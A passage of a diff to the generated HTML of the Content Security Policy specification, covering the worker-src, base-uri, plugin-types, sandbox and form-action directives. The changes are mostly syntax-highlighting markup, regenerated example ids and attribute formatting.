   a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#worker" id="ref-for-worker②">Worker</a></code>, <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#sharedworker" id="ref-for-sharedworker①">SharedWorker</a></code>, or <code class="idl"><a data-link-type="idl" href="https://w3c.github.io/ServiceWorker/#serviceworker" id="ref-for-serviceworker①">ServiceWorker</a></code>. The syntax for the
   directive’s name and value is described by the following ABNF:</p>
 <pre>directive-name  = "worker-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list①⑥">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-4dad9e58">
-     <a class="self-link" href="#example-4dad9e58"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-47208de1">
+     <a class="self-link" href="#example-47208de1"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①⑥">Content-Security-Policy</a>: <a data-link-type="dfn" href="#worker-src" id="ref-for-worker-src③">worker-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>worker-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①⓪">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>script</c-><c- p>></c->
-  <c- a>var</c-> blockedWorker <c- o>=</c-> <c- k>new</c-> Worker<c- p>(</c-><c- u>"data:application/javascript,..."</c-><c- p>);</c->
-  blockedWorker <c- o>=</c-> <c- k>new</c-> SharedWorker<c- p>(</c-><c- u>"https://example.org/"</c-><c- p>);</c->
-  navigator<c- p>.</c->serviceWorker<c- p>.</c->register<c- p>(</c-><c- t>'https://example.org/sw.js'</c-><c- p>);</c->
-<c- p>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">script</span><span class="p">></span>
+  <span class="kd">var</span> blockedWorker <span class="o">=</span> <span class="k">new</span> Worker<span class="p">(</span><span class="s2">"data:application/javascript,..."</span><span class="p">);</span>
+  blockedWorker <span class="o">=</span> <span class="k">new</span> SharedWorker<span class="p">(</span><span class="s2">"https://example.org/"</span><span class="p">);</span>
+  navigator<span class="p">.</span>serviceWorker<span class="p">.</span>register<span class="p">(</span><span class="s1">'https://example.org/sw.js'</span><span class="p">);</span>
+<span class="p">&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="worker-src Pre-request Check" data-level="6.1.17.1" id="worker-src-pre-request"><span class="secno">6.1.17.1. </span><span class="content"> <code>worker-src</code> Pre-request Check </span><a class="self-link" href="#worker-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①⑦">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑤②">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥⑦">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>worker-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④⑤">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="worker-src Post-request Check" data-level="6.1.17.2" id="worker-src-post-request"><span class="secno">6.1.17.2. </span><span class="content"> <code>worker-src</code> Post-request Check </span><a class="self-link" href="#worker-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①⑧">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑤③">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③④">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥⑧">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>worker-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④⑥">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h3 class="heading settled" data-level="6.2" id="directives-document"><span class="secno">6.2. </span><span class="content"> Document Directives </span><a class="self-link" href="#directives-document"></a></h3>
     <p>The following directives govern the properties of a document or worker
   environment to which a policy applies.</p>
     <h4 class="heading settled" data-level="6.2.1" id="directive-base-uri"><span class="secno">6.2.1. </span><span class="content"><code>base-uri</code></span><a class="self-link" href="#directive-base-uri"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="base-uri">base-uri</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url④">URL</a></code>s which can be used in
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="base-uri">base-uri</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url④">URL</a></code>s which can be used in
   a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①④">Document</a></code>'s <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element" id="ref-for-the-base-element①">base</a></code> element. The syntax for the directive’s name and
   value is described by the following ABNF:</p>
 <pre>directive-name  = "base-uri"
@@ -4201,136 +4209,136 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>Given a <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑤">URL</a></code> (<var>base</var>), and a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①⑤">Document</a></code> (<var>document</var>), this algorithm
   returns "<code>Allowed</code>" if <var>base</var> may be used as the value of a <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element" id="ref-for-the-base-element②">base</a></code> element’s <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/semantics.html#attr-base-href" id="ref-for-attr-base-href①">href</a></code> attribute, and "<code>Blocked</code>" otherwise:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①③">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②②">csp list</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>source list</var> be <code>null</code>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If a <a data-link-type="dfn" href="#directives" id="ref-for-directives②⓪">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①③">name</a> is
   "<code>base-uri</code>" is present in <var>policy</var>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set①⓪">directive
   set</a>, set <var>source list</var> to that <a data-link-type="dfn" href="#directives" id="ref-for-directives②①">directive</a>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④⑦">value</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>source list</var> is <code>null</code>, skip to the next <var>policy</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If the result of executing <a href="#match-url-to-source-list">§6.6.2.5 Does url match source list in origin with redirect count?</a> on <var>base</var>, <var>source list</var>, <var>policy</var>’s <a data-link-type="dfn" href="#policy-self-origin" id="ref-for-policy-self-origin②">self-origin</a>, and <code>0</code> is "<code>Does Not Match</code>":</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①④">global
   object</a>, <var>policy</var>, and "<a data-link-type="dfn" href="#base-uri" id="ref-for-base-uri"><code>base-uri</code></a>".</p>
-         <li data-md>
-          <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource①⓪">resource</a> to "<code>inline</code>".</p>
-         <li data-md>
+         <li data-md="">
+          <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource①①">resource</a> to "<code>inline</code>".</p>
+         <li data-md="">
           <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①⑧">disposition</a> is "<code>enforce</code>",
   return "<code>Blocked</code>".</p>
         </ol>
       </ol>
       <p class="note" role="note"><span>Note:</span> We compare against the fallback base URL in order to deal correctly with things like <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#an-iframe-srcdoc-document" id="ref-for-an-iframe-srcdoc-document③">an iframe <code>srcdoc</code> <code>Document</code></a> which has been sandboxed into an opaque origin.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.2.2" id="directive-plugin-types"><span class="secno">6.2.2. </span><span class="content"><code>plugin-types</code></span><a class="self-link" href="#directive-plugin-types"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="plugin-types">plugin-types</dfn> directive restricts the set of plugins that
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="plugin-types">plugin-types</dfn> directive restricts the set of plugins that
   can be embedded into a document by limiting the types of resources which can
   be loaded. The directive’s syntax is described by the following ABNF grammar:</p>
 <pre>directive-name  = "plugin-types"
 directive-value = <a data-link-type="grammar" href="#grammardef-media-type-list" id="ref-for-grammardef-media-type-list">media-type-list</a>
 
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-media-type-list">media-type-list</dfn> = "" / <a data-link-type="grammar" href="#grammardef-media-type" id="ref-for-grammardef-media-type">media-type</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace③">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-media-type" id="ref-for-grammardef-media-type①">media-type</a> )
-<dfn class="dfn-paneled" data-dfn-type="grammar" data-export id="grammardef-media-type">media-type</dfn> = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc2045#section-5.1" id="ref-for-section-5.1">type</a> "/" <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc2045#section-5.1" id="ref-for-section-5.1①">subtype</a>
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-media-type-list">media-type-list</dfn> = "" / <a data-link-type="grammar" href="#grammardef-media-type" id="ref-for-grammardef-media-type">media-type</a> *( <a data-link-type="grammar" href="#grammardef-required-ascii-whitespace" id="ref-for-grammardef-required-ascii-whitespace③">required-ascii-whitespace</a> <a data-link-type="grammar" href="#grammardef-media-type" id="ref-for-grammardef-media-type①">media-type</a> )
+<dfn class="dfn-paneled" data-dfn-type="grammar" data-export="" id="grammardef-media-type">media-type</dfn> = <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc2045#section-5.1" id="ref-for-section-5.1">type</a> "/" <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc2045#section-5.1" id="ref-for-section-5.1①">subtype</a>
 ; <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc2045#section-5.1" id="ref-for-section-5.1②">type</a> and <a data-link-type="grammar" href="https://tools.ietf.org/html/rfc2045#section-5.1" id="ref-for-section-5.1③">subtype</a> are defined in RFC 2045
 </pre>
     <p>If a <code>plugin-types</code> directive is present, instantiation of an <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element" id="ref-for-the-embed-element③">embed</a></code> or <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element" id="ref-for-the-object-element⑤">object</a></code> element will fail if any of the following conditions hold:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>The element does not explicitly declare a <a data-link-type="dfn" href="https://mimesniff.spec.whatwg.org/#valid-mime-type" id="ref-for-valid-mime-type">valid MIME type</a> via a <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-embed-type" id="ref-for-attr-embed-type">type</a></code> attribute.</p>
-     <li data-md>
+     <li data-md="">
       <p>The declared type does not match one of the items in the directive’s
   value.</p>
-     <li data-md>
+     <li data-md="">
       <p>The fetched resource does not match the declared type.</p>
     </ol>
     <p class="note" role="note"><span>Note:</span> The <code>plugin-types</code> grammar allows for an empty directive value in which
   case all instantions of <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element" id="ref-for-the-embed-element④">embed</a></code> and <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element" id="ref-for-the-object-element⑥">object</a></code> will fail.</p>
-    <div class="example" id="example-5240cbd4">
-     <a class="self-link" href="#example-5240cbd4"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-08b2574f">
+     <a class="self-link" href="#example-08b2574f"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①⑦">Content-Security-Policy</a>: <a data-link-type="dfn" href="#plugin-types" id="ref-for-plugin-types">plugin-types</a> application/pdf
 </pre>
      <p>Fetches for the following code will all return network errors:</p>
-<pre class="highlight"><c- c>&lt;!-- No 'type' declaration --></c->
-<c- p>&lt;</c-><c- f>object</c-> <c- e>data</c-><c- o>=</c-><c- s>"https://example.com/flash"</c-><c- p>>&lt;/</c-><c- f>object</c-><c- p>></c->
+<pre class="highlight"><span class="c">&lt;!-- No 'type' declaration --></span>
+<span class="p">&lt;</span><span class="nt">object</span> <span class="na">data</span><span class="o">=</span><span class="s">"https://example.com/flash"</span><span class="p">>&lt;/</span><span class="nt">object</span><span class="p">></span>
 
-<c- c>&lt;!-- Non-matching 'type' declaration --></c->
-<c- p>&lt;</c-><c- f>object</c-> <c- e>data</c-><c- o>=</c-><c- s>"https://example.com/flash"</c-> <c- e>type</c-><c- o>=</c-><c- s>"application/x-shockwave-flash"</c-><c- p>>&lt;/</c-><c- f>object</c-><c- p>></c->
+<span class="c">&lt;!-- Non-matching 'type' declaration --></span>
+<span class="p">&lt;</span><span class="nt">object</span> <span class="na">data</span><span class="o">=</span><span class="s">"https://example.com/flash"</span> <span class="na">type</span><span class="o">=</span><span class="s">"application/x-shockwave-flash"</span><span class="p">>&lt;/</span><span class="nt">object</span><span class="p">></span>
 
-<c- c>&lt;!-- Non-matching resource --></c->
-<c- p>&lt;</c-><c- f>object</c-> <c- e>data</c-><c- o>=</c-><c- s>"https://example.com/flash"</c-> <c- e>type</c-><c- o>=</c-><c- s>"application/pdf"</c-><c- p>>&lt;/</c-><c- f>object</c-><c- p>></c->
+<span class="c">&lt;!-- Non-matching resource --></span>
+<span class="p">&lt;</span><span class="nt">object</span> <span class="na">data</span><span class="o">=</span><span class="s">"https://example.com/flash"</span> <span class="na">type</span><span class="o">=</span><span class="s">"application/pdf"</span><span class="p">>&lt;/</span><span class="nt">object</span><span class="p">></span>
 </pre>
      <p>If the page allowed Flash content by sending the following header:</p>
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①⑧">Content-Security-Policy</a>: <a data-link-type="dfn" href="#plugin-types" id="ref-for-plugin-types①">plugin-types</a> application/x-shockwave-flash
 </pre>
      <p>Then the second item above would load successfully:</p>
-<pre class="highlight"><c- c>&lt;!-- Matching 'type' declaration and resource --></c->
-<c- p>&lt;</c-><c- f>object</c-> <c- e>data</c-><c- o>=</c-><c- s>"https://example.com/flash"</c-> <c- e>type</c-><c- o>=</c-><c- s>"application/x-shockwave-flash"</c-><c- p>>&lt;/</c-><c- f>object</c-><c- p>></c->
+<pre class="highlight"><span class="c">&lt;!-- Matching 'type' declaration and resource --></span>
+<span class="p">&lt;</span><span class="nt">object</span> <span class="na">data</span><span class="o">=</span><span class="s">"https://example.com/flash"</span> <span class="na">type</span><span class="o">=</span><span class="s">"application/x-shockwave-flash"</span><span class="p">>&lt;/</span><span class="nt">object</span><span class="p">></span>
 </pre>
     </div>
-    <h5 class="heading settled algorithm" data-algorithm="plugin-types Post-Request Check" data-dfn-type="dfn" data-level="6.2.2.1" data-lt="plugin-types Post-Request Check" data-noexport id="plugin-types-post-request-check"><span class="secno">6.2.2.1. </span><span class="content"> <code>plugin-types</code> Post-Request Check </span><a class="self-link" href="#plugin-types-post-request-check"></a></h5>
+    <h5 class="heading settled algorithm" data-algorithm="plugin-types Post-Request Check" data-dfn-type="dfn" data-level="6.2.2.1" data-lt="plugin-types Post-Request Check" data-noexport="" id="plugin-types-post-request-check"><span class="secno">6.2.2.1. </span><span class="content"> <code>plugin-types</code> Post-Request Check </span><a class="self-link" href="#plugin-types-post-request-check"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check①⑨">post-request check</a> algorithm is as
   follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑤④">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③⑤">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑥⑨">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>policy</var> is unused.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination④">destination</a> is either "<code>object</code>"
   or "<code>embed</code>":</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>type</var> be the result of <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-header-extract-mime-type" id="ref-for-concept-header-extract-mime-type">extracting a
   MIME type</a> from <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-header-list" id="ref-for-concept-response-header-list④">header list</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>type</var> is not an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive②">ASCII case-insensitive</a> match for any item
   in this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④⑧">value</a>, return "<code>Blocked</code>".</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled dfn-paneled algorithm" data-algorithm="Should plugin element be blocked a priori by Content
-    Security Policy?:" data-dfn-type="dfn" data-level="6.2.2.2" data-lt="Should plugin element be blocked a priori by Content Security Policy?:" data-noexport id="should-plugin-element-be-blocked-a-priori-by-content-security-policy"><span class="secno">6.2.2.2. </span><span class="content"> Should <var>plugin element</var> be blocked <i lang="la">a priori</i> by Content
+    Security Policy?:" data-dfn-type="dfn" data-level="6.2.2.2" data-lt="Should plugin element be blocked a priori by Content Security Policy?:" data-noexport="" id="should-plugin-element-be-blocked-a-priori-by-content-security-policy"><span class="secno">6.2.2.2. </span><span class="content"> Should <var>plugin element</var> be blocked <i lang="la">a priori</i> by Content
     Security Policy?: </span></h5>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element⑨">Element</a></code> (<var>plugin element</var>), this algorithm returns "<code>Blocked</code>"
   or "<code>Allowed</code>" based on the element’s <code>type</code> attribute and the policy applied to
   its document:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>plugin element</var>’s <a data-link-type="dfn" href="https://dom.spec.whatwg.org/#concept-node-document" id="ref-for-concept-node-document">node document</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list⑧">CSP list</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>policy</var> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives②②">directive</a> (<var>directive</var>) whose name is <code>plugin-types</code>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>type</var> be "<code>application/x-java-applet</code>" if <var>plugin element</var> is an <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/obsolete.html#applet" id="ref-for-applet③"><code>applet</code></a> element, or <var>plugin element</var>’s <code>type</code> attribute’s
   value if present, or "<code>null</code>" otherwise.</p>
-         <li data-md>
+         <li data-md="">
           <p>Return "<code>Blocked</code>" if any of the following are true:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p><var>type</var> is <code>null</code>.</p>
-           <li data-md>
+           <li data-md="">
             <p><var>type</var> is not a <a data-link-type="dfn" href="https://mimesniff.spec.whatwg.org/#valid-mime-type" id="ref-for-valid-mime-type①">valid MIME type</a>.</p>
-           <li data-md>
+           <li data-md="">
             <p><var>type</var> is not an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive③">ASCII case-insensitive</a> match for any
   item in <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④⑨">value</a>.</p>
           </ol>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.2.3" id="directive-sandbox"><span class="secno">6.2.3. </span><span class="content"><code>sandbox</code></span><a class="self-link" href="#directive-sandbox"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="sandbox">sandbox</dfn> directive specifies an HTML sandbox policy which the
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="sandbox">sandbox</dfn> directive specifies an HTML sandbox policy which the
   user agent will apply to a resource, just as though it had been included in
   an <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element" id="ref-for-the-iframe-element②">iframe</a></code> with a <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#attr-iframe-sandbox" id="ref-for-attr-iframe-sandbox">sandbox</a></code> property.</p>
     <p>The directive’s syntax is described by the following ABNF grammar, with
@@ -4347,16 +4355,16 @@ directive-value = "" / <a data-link-type="grammar" href="https://tools.ietf.org/
   follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request⑤⑤">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③⑥">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦⓪">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>response</var> is unused.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①⑨">disposition</a> is not "<code>enforce</code>", then
   return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination⑤">destination</a> is one of
   "<code>serviceworker</code>", "<code>sharedworker</code>", or "<code>worker</code>":</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>If the result of the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#parse-a-sandboxing-directive" id="ref-for-parse-a-sandboxing-directive">Parse a sandboxing directive</a> algorithm
   using this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤⓪">value</a> as the input
   contains either the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#sandboxed-scripts-browsing-context-flag" id="ref-for-sandboxed-scripts-browsing-context-flag">sandboxed scripts browsing context flag</a> or
@@ -4365,7 +4373,7 @@ directive-value = "" / <a data-link-type="grammar" href="https://tools.ietf.org/
         <p class="note" role="note"><span>Note:</span> This will need to change if we allow Workers to be sandboxed into
   unique origins, which seems like a pretty reasonable thing to do.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="sandbox Initialization" data-level="6.2.3.2" id="sandbox-init"><span class="secno">6.2.3.2. </span><span class="content"> <code>sandbox</code> Initialization </span><a class="self-link" href="#sandbox-init"></a></h5>
@@ -4374,19 +4382,19 @@ directive-value = "" / <a data-link-type="grammar" href="https://tools.ietf.org/
   follows:</p>
     <p>Given a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①⑦">Document</a></code> or <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①⑤">global object</a> (<var>context</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response③⑦">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object⑦①">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>response</var> is unused.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition②⓪">disposition</a> is not "<code>enforce</code>", or <var>context</var> is not a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①⑧">Document</a></code>, then abort this algorithm.</p>
       <p class="note" role="note"><span>Note:</span> This will need to change if we allow Workers to be sandboxed,
   which seems like a pretty reasonable thing to do.</p>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#parse-a-sandboxing-directive" id="ref-for-parse-a-sandboxing-directive①">Parse a sandboxing directive</a> using this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤①">value</a> as the input, and <var>context</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/origin.html#forced-sandboxing-flag-set" id="ref-for-forced-sandboxing-flag-set①">forced
   sandboxing flag set</a> as the output.</p>
     </ol>
     <h3 class="heading settled" data-level="6.3" id="directives-navigation"><span class="secno">6.3. </span><span class="content"> Navigation Directives </span><a class="self-link" href="#directives-navigation"></a></h3>
     <h4 class="heading settled" data-level="6.3.1" id="directive-form-action"><span class="secno">6.3.1. </span><span class="content"><code>form-action</code></span><a class="self-link" href="#directive-form-action"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="form-action">form-action</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑥">URL</a></code>s which can be used
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="form-action">form-action</dfn> directive restricts the <code class="idl"><a data-link-type="idl" href="https://url.spec.whatwg.org/#url" id="ref-for-url⑥">URL</a></code>s which can be used
   as the target of a form submissions from a given context. The directive’s syntax is
   described by the following ABNF grammar:</p>
 <pre class="abnf">directive-name  = "form-action"
@@ -4398,19 +4406,19 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
   submission violates the <code>form-action</code> directive’s constraints, and "<code>Allowed</code>"
   otherwise. This constitutes the <code>form-action</code> directive’s <a data-link-type="dfn" href="#directive-pre-navigation-check" id="ref-for-directive-pre-navigation-check①">pre-navigation check</a>:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>policy</var> is unused in this algorithm.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>navigation type</var> is "<code>form-submission</code>":</p>
       <ol>
-       <li data-md>
+       <li data-md="">
